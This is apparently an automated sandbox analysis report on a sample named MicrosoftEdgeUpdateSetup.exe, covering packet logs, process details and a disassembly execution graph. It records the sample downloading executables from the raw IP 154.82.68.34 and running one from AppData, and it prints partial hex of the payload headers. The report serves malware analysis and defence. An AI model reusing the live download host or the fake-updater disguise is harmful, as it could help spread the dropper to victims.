                                      Dec 22, 2024 08:37:11.320276976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.320362091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.320400953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.321392059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.321434975 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.321521997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.321561098 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.322585106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.322629929 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.322747946 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.322788000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.323724985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.323776007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.323844910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.323888063 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.324908018 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.324949980 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.325148106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.325186014 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.326129913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.326178074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.326255083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.326291084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.327302933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.327358961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.327429056 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.327466965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.328562975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.328613997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.328646898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.328685999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.329617977 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.329668999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.329726934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.329766035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.330986023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.330997944 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.331027985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.331043959 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.331954956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.331999063 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.332065105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.332132101 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.333142042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.333178043 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.333264112 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.333300114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.334323883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.334368944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.334424973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.334461927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.335519075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.335572958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.335702896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.335743904 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.336680889 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.336730957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.336775064 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.336813927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.337872982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.337908983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.337990999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.338032961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.339020967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.339066029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.469856024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.469902992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.469918013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.469938993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.470314026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.470361948 CET4973016653192.168.2.4154.82.68.34

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730154.82.68.34166536568C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 22, 2024 08:37:01.795614958 CET295OUTGET /RuntimeBrokers.exe HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Host: 154.82.68.34:16653
                                      Connection: Keep-Alive
                                      Dec 22, 2024 08:37:03.334145069 CET1236INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sun, 22 Dec 2024 07:37:06 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 1770080
                                      Last-Modified: Wed, 18 Dec 2024 05:31:28 GMT
                                      Connection: keep-alive
                                      ETag: "67625e30-1b0260"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d f6 f8 d8 c9 97 96 8b c9 97 96 8b c9 97 96 8b 7d 0b 67 8b db 97 96 8b 7d 0b 65 8b 74 97 96 8b 7d 0b 64 8b d7 97 96 8b a6 e1 3c 8b ca 97 96 8b a3 ff 93 8a c8 97 96 8b a3 ff 92 8a d9 97 96 8b 57 37 51 8b cf 97 96 8b 9b ff 95 8a d3 97 96 8b 9b ff 93 8a 88 97 96 8b 9b ff 92 8a ea 97 96 8b c0 ef 15 8b ca 97 96 8b 6a fe 97 8a cb 97 96 8b 6a fe 9f 8a ca 97 96 8b c0 ef 05 8b de 97 96 8b c9 97 97 8b cd 96 96 8b 6a fe 93 8a e8 97 96 8b 6a fe 69 8b c8 97 96 8b c9 97 01 8b c8 97 96 8b 6a fe 94 8a c8 97 96 8b 52 69 63 68 c9 97 96 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 31 fe 4e 66 00 00 00 00 00 00 [TRUNCATED]
                                      Data Ascii: MZ@@!L!This program cannot be run in DOS mode.$}g}et}d<W7QjjjjijRichPEL1Nf^@P!%-$I`(T8@@.textL `.rdata@@.data/pR@.rsrc.@@
                                      Dec 22, 2024 08:37:07.658412933 CET287OUTGET /common.dll HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Host: 154.82.68.34:16653
                                      Connection: Keep-Alive
                                      Dec 22, 2024 08:37:08.199059963 CET1236INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sun, 22 Dec 2024 07:37:11 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 3925088
                                      Last-Modified: Wed, 18 Dec 2024 05:31:28 GMT
                                      Connection: keep-alive
                                      ETag: "67625e30-3be460"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 b7 47 a4 05 d6 29 f7 05 d6 29 f7 05 d6 29 f7 94 bf 2d f6 9f d4 29 f7 6a a0 83 f7 06 d6 29 f7 6f be 2d f6 15 d6 29 f7 6f be 2c f6 00 d6 29 f7 9b 76 ee f7 0f d6 29 f7 57 be 2d f6 09 d6 29 f7 57 be 2a f6 15 d6 29 f7 57 be 2c f6 27 d6 29 f7 57 be 28 f6 01 d6 29 f7 0c ae aa f7 0d d6 29 f7 95 bf 2c f6 51 d6 29 f7 a6 bf 21 f6 0c d6 29 f7 0c ae ba f7 3a d6 29 f7 05 d6 28 f7 57 d5 29 f7 a6 bf 2d f6 04 d6 29 f7 a6 bf 2c f6 67 d6 29 f7 a6 bf 29 f6 04 d6 29 f7 a6 bf d6 f7 04 d6 29 f7 05 d6 be f7 04 d6 29 f7 a6 bf 2b f6 04 d6 29 f7 52 69 63 68 05 d6 29 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 [TRUNCATED]
                                      Data Ascii: MZ@P!L!This program cannot be run in DOS mode.$AG)))-)j)o-)o,)v)W-)W*)W,')W()),Q)!):)(W)-),g)))))+)Rich)PELNf!)dE)`<;@`.6v7:;`( :12T22@).text)) `.rdata2)4)@@.data08v7@.QMGuid9l9@.rsrc:n9@@.reloc1 :29@B


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:02:37:00
                                      Start date:22/12/2024
                                      Path:C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe"
                                      Imagebase:0x160000
                                      File size:1'634'896 bytes
                                      MD5 hash:E0596BFB4CE5773932F2C2047E2DE77B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:02:37:13
                                      Start date:22/12/2024
                                      Path:C:\Users\user\AppData\Roaming\RuntimeBrokers.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\RuntimeBrokers.exe"
                                      Imagebase:0x400000
                                      File size:1'770'080 bytes
                                      MD5 hash:70E1B494A6097723A9B8BBE2CF41CF0A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:7.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:7.4%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:22
                                        execution_graph 12763 17b896 12764 17b85d 12763->12764 12766 17bb71 12764->12766 12792 17b8cf 12766->12792 12769 17bbde 12770 17bb0f DloadReleaseSectionWriteAccess 8 API calls 12769->12770 12771 17bbe9 RaiseException 12770->12771 12772 17bdd7 12771->12772 12772->12764 12773 17bc7a LoadLibraryExA 12774 17bc8d GetLastError 12773->12774 12775 17bcdb 12773->12775 12777 17bcb6 12774->12777 12778 17bca0 12774->12778 12776 17bce6 FreeLibrary 12775->12776 12779 17bced 12775->12779 12776->12779 12783 17bb0f DloadReleaseSectionWriteAccess 8 API calls 12777->12783 12778->12775 12778->12777 12780 17bd4b GetProcAddress 12779->12780 12787 17bda9 12779->12787 12782 17bd5b GetLastError 12780->12782 12780->12787 12781 17bc02 12781->12773 12781->12775 12781->12779 12781->12787 12785 17bd6e 12782->12785 12784 17bcc1 RaiseException 12783->12784 12784->12772 12785->12787 12788 17bb0f DloadReleaseSectionWriteAccess 8 API calls 12785->12788 12798 17bb0f 12787->12798 12789 17bd8f RaiseException 12788->12789 12790 17b8cf ___delayLoadHelper2@8 7 API calls 12789->12790 12791 17bda6 12790->12791 12791->12787 12793 17b8fc 12792->12793 12794 17b8db 12792->12794 12793->12769 12793->12781 12806 17b978 12794->12806 12796 17b8e0 12796->12793 12811 17baa1 12796->12811 12799 17bb43 12798->12799 12800 17bb21 12798->12800 12799->12772 12801 17b978 DloadReleaseSectionWriteAccess 4 API calls 12800->12801 12802 17bb26 12801->12802 12803 17bb3e 12802->12803 12804 17baa1 DloadProtectSection 3 API calls 12802->12804 12826 17bb45 12803->12826 12804->12803 12816 17b902 12806->12816 12809 17b995 RtlAcquireSRWLockExclusive 12809->12796 12810 17b999 12810->12796 12812 17bab6 DloadProtectSection 12811->12812 12813 17babc 12812->12813 12814 17baf1 VirtualProtect 12812->12814 12822 17b9b7 VirtualQuery 12812->12822 12813->12793 12814->12813 12817 17b910 12816->12817 12819 17b925 12816->12819 12818 17b914 GetModuleHandleW 12817->12818 12817->12819 12818->12819 12820 17b929 GetProcAddress 12818->12820 12819->12809 12819->12810 12820->12819 12821 17b939 GetProcAddress 12820->12821 12821->12819 12823 17b9d2 12822->12823 12824 17ba14 12823->12824 12825 17b9dd GetSystemInfo 12823->12825 12824->12814 12825->12824 12827 17b902 DloadReleaseSectionWriteAccess 3 API calls 12826->12827 12828 17bb4a 12827->12828 12829 17bb66 12828->12829 12830 17bb62 RtlReleaseSRWLockExclusive 12828->12830 12829->12799 12830->12799 15624 17b853 15625 17b85d 15624->15625 15626 17bb71 ___delayLoadHelper2@8 16 API calls 15625->15626 15626->15625 12831 168272 12832 16827e ___scrt_is_nonwritable_in_current_image 12831->12832 12859 168470 12832->12859 12834 168285 12835 1683d8 12834->12835 12843 1682af ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 12834->12843 12957 16876f IsProcessorFeaturePresent 12835->12957 12837 1683df 12961 16bb6c 12837->12961 12842 1682ce 12843->12842 12850 16834f 12843->12850 12940 16bb46 12843->12940 12867 16888a 12850->12867 12854 168375 12855 16837e 12854->12855 12948 16bb21 12854->12948 12951 1685e1 12855->12951 12860 168479 12859->12860 12967 168a15 IsProcessorFeaturePresent 12860->12967 12864 16848a 12865 16848e 12864->12865 12977 168ef0 12864->12977 12865->12834 13039 169110 12867->13039 12870 168355 12871 16b7c7 12870->12871 13041 16fc70 12871->13041 12873 16b7d0 12875 16835d 12873->12875 13047 16ff96 12873->13047 12876 163109 GetModuleHandleW GetProcAddress 12875->12876 12877 16313c 12876->12877 13637 16362b 12877->13637 12890 1631af 13709 16187b GetCommandLineW CommandLineToArgvW 12890->13709 12891 16319d 13694 163055 GetModuleFileNameW 12891->13694 12895 1631a5 12900 161302 RtlFreeHeap 12895->12900 12896 1631c7 12899 16132b 40 API calls 12896->12899 12897 1631bd 13827 162ea5 RegCreateKeyExA 12897->13827 12902 1631cf 12899->12902 12903 163335 12900->12903 12905 163afc 26 API calls 12902->12905 12906 168bf5 _ValidateLocalCookies 5 API calls 12903->12906 12907 1631d8 12905->12907 12908 163344 12906->12908 12909 161684 59 API calls 12907->12909 12946 1688c0 GetModuleHandleW 12908->12946 12910 1631e7 12909->12910 12911 1617f7 28 API calls 12910->12911 12912 1631f5 12911->12912 12913 161302 RtlFreeHeap 12912->12913 12914 163202 12913->12914 12915 163206 12914->12915 13721 1641bd 12914->13721 12917 1641bd 8 API calls 12915->12917 12918 163241 12917->12918 13726 164202 12918->13726 12921 16328f 13849 162dd7 12921->13849 12922 163284 13740 1615dc 12922->13740 12927 1632a2 _unexpected 13745 1619d0 12927->13745 12935 163315 13879 161a2d 12935->13879 12937 1632d4 12937->12935 12938 1632e2 RegOpenKeyExA 12937->12938 12938->12935 12939 1632fe RegDeleteValueA RegCloseKey 12938->12939 12939->12935 12941 16bb5c ___scrt_is_nonwritable_in_current_image __dosmaperr 12940->12941 12941->12850 12942 16e809 _unexpected 37 API calls 12941->12942 12943 16c250 12942->12943 12944 16c2fb CallUnexpected 37 API calls 12943->12944 12945 16c27a 12944->12945 12947 168371 12946->12947 12947->12837 12947->12854 15279 16b9c7 12948->15279 12952 1685ed 12951->12952 12953 168386 12952->12953 15349 16c1b0 12952->15349 12953->12842 12955 1685fb 12956 168ef0 ___scrt_uninitialize_crt 7 API calls 12955->12956 12956->12953 12958 168785 _unexpected 12957->12958 12959 168830 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12958->12959 12960 16887b _unexpected 12959->12960 12960->12837 12962 16b9c7 _unexpected 23 API calls 12961->12962 12963 1683e5 12962->12963 12964 16bb30 12963->12964 12965 16b9c7 _unexpected 23 API calls 12964->12965 12966 1683ed 12965->12966 12968 168485 12967->12968 12969 168ed1 12968->12969 12983 16951a 12969->12983 12972 168eda 12972->12864 12974 168ee2 12975 168eed 12974->12975 12997 169556 12974->12997 12975->12864 12978 168f03 12977->12978 12979 168ef9 12977->12979 12978->12865 12980 1694ff ___vcrt_uninitialize_ptd 6 API calls 12979->12980 12981 168efe 12980->12981 12982 169556 ___vcrt_uninitialize_locks DeleteCriticalSection 12981->12982 12982->12978 12984 169523 12983->12984 12986 16954c 12984->12986 12988 168ed6 12984->12988 13001 169797 12984->13001 12987 169556 ___vcrt_uninitialize_locks DeleteCriticalSection 12986->12987 12987->12988 12988->12972 12989 1694cc 12988->12989 13020 1696a8 12989->13020 12994 1694fc 12994->12974 12996 1694e1 12996->12974 12998 169580 12997->12998 12999 169561 12997->12999 12998->12972 13000 16956b DeleteCriticalSection 12999->13000 13000->12998 13000->13000 13006 16965e 13001->13006 13004 1697cf InitializeCriticalSectionAndSpinCount 13005 1697ba 13004->13005 13005->12984 13007 169677 13006->13007 13010 16969a 13006->13010 13007->13010 13012 1695c3 13007->13012 13010->13004 13010->13005 13011 16968c GetProcAddress 13011->13010 13017 1695cf 13012->13017 13013 169644 13013->13010 13013->13011 13014 1695e6 LoadLibraryExW 13015 169604 GetLastError 13014->13015 13016 16964b 13014->13016 13015->13017 13016->13013 13018 169653 FreeLibrary 13016->13018 13017->13013 13017->13014 13019 169626 LoadLibraryExW 13017->13019 13018->13013 13019->13016 13019->13017 13021 16965e ___vcrt_FlsGetValue 5 API calls 13020->13021 13022 1696c2 13021->13022 13023 1696db TlsAlloc 13022->13023 13024 1694d6 13022->13024 13024->12996 13025 169759 13024->13025 13026 16965e ___vcrt_FlsGetValue 5 API calls 13025->13026 13027 169773 13026->13027 13028 16978e TlsSetValue 13027->13028 13029 1694ef 13027->13029 13028->13029 13029->12994 13030 1694ff 13029->13030 13031 16950f 13030->13031 13032 169509 13030->13032 13031->12996 13034 1696e3 13032->13034 13035 16965e ___vcrt_FlsGetValue 5 API calls 13034->13035 13036 1696fd 13035->13036 13037 169715 TlsFree 13036->13037 13038 169709 13036->13038 13037->13038 13038->13031 13040 16889d GetStartupInfoW 13039->13040 13040->12870 13042 16fcab 13041->13042 13043 16fc79 13041->13043 13042->12873 13050 16e8c6 13043->13050 13634 16ff3f 13047->13634 13051 16e8d1 13050->13051 13052 16e8d7 13050->13052 13094 17143c 13051->13094 13074 16e8dd 13052->13074 13099 17147b 13052->13099 13060 16e91e 13064 17147b __dosmaperr 6 API calls 13060->13064 13061 16e909 13063 17147b __dosmaperr 6 API calls 13061->13063 13062 16e956 13075 16fab9 13062->13075 13065 16e915 13063->13065 13066 16e92a 13064->13066 13111 16ed43 13065->13111 13067 16e92e 13066->13067 13068 16e93d 13066->13068 13071 17147b __dosmaperr 6 API calls 13067->13071 13117 16e62e 13068->13117 13071->13065 13073 16ed43 _free 14 API calls 13073->13074 13074->13062 13122 16c2fb 13074->13122 13432 16fbcd 13075->13432 13080 16fae5 13080->13042 13085 16ed43 _free 14 API calls 13087 16fb36 13085->13087 13086 16fb23 13088 16ecd3 __dosmaperr 14 API calls 13086->13088 13087->13042 13093 16fb28 13088->13093 13089 16fb6a 13089->13093 13468 16f755 13089->13468 13090 16fb3e 13090->13089 13091 16ed43 _free 14 API calls 13090->13091 13091->13089 13093->13085 13133 1712dc 13094->13133 13096 171458 13097 171473 TlsGetValue 13096->13097 13098 171461 13096->13098 13098->13052 13100 1712dc __dosmaperr 5 API calls 13099->13100 13101 171497 13100->13101 13102 1714b5 TlsSetValue 13101->13102 13103 16e8f1 13101->13103 13103->13074 13104 16ece6 13103->13104 13109 16ecf3 __dosmaperr 13104->13109 13105 16ed33 13149 16ecd3 13105->13149 13106 16ed1e HeapAlloc 13107 16e901 13106->13107 13106->13109 13107->13060 13107->13061 13109->13105 13109->13106 13146 171752 13109->13146 13112 16ed4e HeapFree 13111->13112 13113 16ed77 __dosmaperr 13111->13113 13112->13113 13114 16ed63 13112->13114 13113->13074 13115 16ecd3 __dosmaperr 12 API calls 13114->13115 13116 16ed69 GetLastError 13115->13116 13116->13113 13186 16e4c2 13117->13186 13328 1718a9 13122->13328 13126 16c334 13130 16bb30 _unexpected 23 API calls 13126->13130 13127 16c315 IsProcessorFeaturePresent 13129 16c321 13127->13129 13128 16c30b 13128->13126 13128->13127 13358 16ea6a 13129->13358 13132 16c33e 13130->13132 13134 17130a 13133->13134 13138 171306 __dosmaperr 13133->13138 13134->13138 13139 171215 13134->13139 13137 171324 GetProcAddress 13137->13138 13138->13096 13140 171226 13139->13140 13141 1712d1 13140->13141 13142 171244 LoadLibraryExW 13140->13142 13144 1712ba FreeLibrary 13140->13144 13145 171292 LoadLibraryExW 13140->13145 13141->13137 13141->13138 13142->13140 13143 17125f GetLastError 13142->13143 13143->13140 13144->13140 13145->13140 13152 17177f 13146->13152 13163 16e960 GetLastError 13149->13163 13151 16ecd8 13151->13107 13153 17178b ___scrt_is_nonwritable_in_current_image 13152->13153 13158 170201 EnterCriticalSection 13153->13158 13155 171796 13159 1717d2 13155->13159 13158->13155 13162 170251 LeaveCriticalSection 13159->13162 13161 17175d 13161->13109 13162->13161 13164 16e977 13163->13164 13165 16e97d 13163->13165 13167 17143c __dosmaperr 6 API calls 13164->13167 13166 17147b __dosmaperr 6 API calls 13165->13166 13169 16e983 SetLastError 13165->13169 13168 16e99b 13166->13168 13167->13165 13168->13169 13170 16ece6 __dosmaperr 12 API calls 13168->13170 13169->13151 13172 16e9ab 13170->13172 13173 16e9b3 13172->13173 13174 16e9ca 13172->13174 13176 17147b __dosmaperr 6 API calls 13173->13176 13175 17147b __dosmaperr 6 API calls 13174->13175 13177 16e9d6 13175->13177 13178 16e9c1 13176->13178 13179 16e9da 13177->13179 13180 16e9eb 13177->13180 13183 16ed43 _free 12 API calls 13178->13183 13181 17147b __dosmaperr 6 API calls 13179->13181 13182 16e62e __dosmaperr 12 API calls 13180->13182 13181->13178 13184 16e9f6 13182->13184 13183->13169 13185 16ed43 _free 12 API calls 13184->13185 13185->13169 13187 16e4ce ___scrt_is_nonwritable_in_current_image 13186->13187 13200 170201 EnterCriticalSection 13187->13200 13189 16e4d8 13201 16e508 13189->13201 13192 16e5d4 13193 16e5e0 ___scrt_is_nonwritable_in_current_image 13192->13193 13205 170201 EnterCriticalSection 13193->13205 13195 16e5ea 13206 16e7be 13195->13206 13197 16e602 13210 16e622 13197->13210 13200->13189 13204 170251 LeaveCriticalSection 13201->13204 13203 16e4f6 13203->13192 13204->13203 13205->13195 13207 16e7f4 __fassign 13206->13207 13208 16e7cd __fassign 13206->13208 13207->13197 13208->13207 13213 170ea9 13208->13213 13327 170251 LeaveCriticalSection 13210->13327 13212 16e610 13212->13073 13214 170ebf 13213->13214 13215 170f29 13213->13215 13214->13215 13219 170ef2 13214->13219 13222 16ed43 _free 14 API calls 13214->13222 13217 16ed43 _free 14 API calls 13215->13217 13240 170f77 13215->13240 13218 170f4b 13217->13218 13220 16ed43 _free 14 API calls 13218->13220 13221 170f14 13219->13221 13228 16ed43 _free 14 API calls 13219->13228 13223 170f5e 13220->13223 13224 16ed43 _free 14 API calls 13221->13224 13226 170ee7 13222->13226 13227 16ed43 _free 14 API calls 13223->13227 13229 170f1e 13224->13229 13225 170fe5 13230 16ed43 _free 14 API calls 13225->13230 13241 17073c 13226->13241 13232 170f6c 13227->13232 13233 170f09 13228->13233 13235 16ed43 _free 14 API calls 13229->13235 13236 170feb 13230->13236 13237 16ed43 _free 14 API calls 13232->13237 13269 17083a 13233->13269 13234 170f85 13234->13225 13239 16ed43 14 API calls _free 13234->13239 13235->13215 13236->13207 13237->13240 13239->13234 13281 17101b 13240->13281 13242 17074d 13241->13242 13268 170836 13241->13268 13243 17075e 13242->13243 13244 16ed43 _free 14 API calls 13242->13244 13245 170770 13243->13245 13247 16ed43 _free 14 API calls 13243->13247 13244->13243 13246 170782 13245->13246 13248 16ed43 _free 14 API calls 13245->13248 13249 170794 13246->13249 13250 16ed43 _free 14 API calls 13246->13250 13247->13245 13248->13246 13251 1707a6 13249->13251 13252 16ed43 _free 14 API calls 13249->13252 13250->13249 13253 1707b8 13251->13253 13255 16ed43 _free 14 API calls 13251->13255 13252->13251 13254 1707ca 13253->13254 13256 16ed43 _free 14 API calls 13253->13256 13257 1707dc 13254->13257 13258 16ed43 _free 14 API calls 13254->13258 13255->13253 13256->13254 13259 1707ee 13257->13259 13260 16ed43 _free 14 API calls 13257->13260 13258->13257 13261 170800 13259->13261 13263 16ed43 _free 14 API calls 13259->13263 13260->13259 13262 170812 13261->13262 13264 16ed43 _free 14 API calls 13261->13264 13265 16ed43 _free 14 API calls 13262->13265 13266 170824 13262->13266 13263->13261 13264->13262 13265->13266 13267 16ed43 _free 14 API calls 13266->13267 13266->13268 13267->13268 13268->13219 13270 170847 13269->13270 13280 17089f 13269->13280 13271 170857 13270->13271 13272 16ed43 _free 14 API calls 13270->13272 13273 170869 13271->13273 13274 16ed43 _free 14 API calls 13271->13274 13272->13271 13275 16ed43 _free 14 API calls 13273->13275 13276 17087b 13273->13276 13274->13273 13275->13276 13277 17088d 13276->13277 13278 16ed43 _free 14 API calls 13276->13278 13279 16ed43 _free 14 API calls 13277->13279 13277->13280 13278->13277 13279->13280 13280->13221 13282 171028 13281->13282 13286 171047 13281->13286 13282->13286 13287 1708db 13282->13287 13285 16ed43 _free 14 API calls 13285->13286 13286->13234 13288 1709b9 13287->13288 13289 1708ec 13287->13289 13288->13285 13323 1708a3 13289->13323 13292 1708a3 __fassign 14 API calls 13293 1708ff 13292->13293 13294 1708a3 __fassign 14 API calls 13293->13294 13295 17090a 13294->13295 13296 1708a3 __fassign 14 API calls 13295->13296 13297 170915 13296->13297 13298 1708a3 __fassign 14 API calls 13297->13298 13299 170923 13298->13299 13300 16ed43 _free 14 API calls 13299->13300 13301 17092e 13300->13301 13302 16ed43 _free 14 API calls 13301->13302 13303 170939 13302->13303 13304 16ed43 _free 14 API calls 13303->13304 13305 170944 13304->13305 13306 1708a3 __fassign 14 API calls 13305->13306 13307 170952 13306->13307 13308 1708a3 __fassign 14 API calls 13307->13308 13309 170960 13308->13309 13310 1708a3 __fassign 14 API calls 13309->13310 13311 170971 13310->13311 13312 1708a3 __fassign 14 API calls 13311->13312 13313 17097f 13312->13313 13314 1708a3 __fassign 14 API calls 13313->13314 13315 17098d 13314->13315 13316 16ed43 _free 14 API calls 13315->13316 13317 170998 13316->13317 13318 16ed43 _free 14 API calls 13317->13318 13319 1709a3 13318->13319 13320 16ed43 _free 14 API calls 13319->13320 13321 1709ae 13320->13321 13322 16ed43 _free 14 API calls 13321->13322 